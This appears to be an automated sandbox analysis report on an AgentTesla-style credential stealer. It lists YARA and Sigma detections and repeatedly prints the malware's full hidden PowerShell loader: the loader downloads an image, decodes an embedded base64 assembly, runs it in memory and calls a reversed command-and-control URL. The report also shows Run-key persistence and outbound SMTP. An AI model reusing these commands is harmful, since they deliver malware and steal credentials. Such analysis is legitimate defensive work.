6.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x35b0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35b81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35c0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35c9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35d07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35d79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35e0f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35e9f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.powershell.exe.1cb958bf960.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.powershell.exe.1cb958bf960.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.powershell.exe.1cb958bf960.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33d0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33d81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33e0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33e9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33f07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33f79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3400f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3409f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.powershell.exe.1cb958bf960.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.powershell.exe.1cb958bf960.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.powershell.exe.1cb958bf960.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.powershell.exe.1cb958bf960.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x35b0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72d47:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35b81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72db9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35c0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72e43:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35c9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72ed5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35d07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72f3f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35d79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72fb1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35e0f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x73047:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35e9f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x730d7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 6 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7552.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js", CommandLine|base64offset|contains: H, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js", ProcessId: 7340, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\alarvice.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7552, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7552, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js", ProcessId: 7664, ProcessName: cmd.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.230.212.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 7736, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? 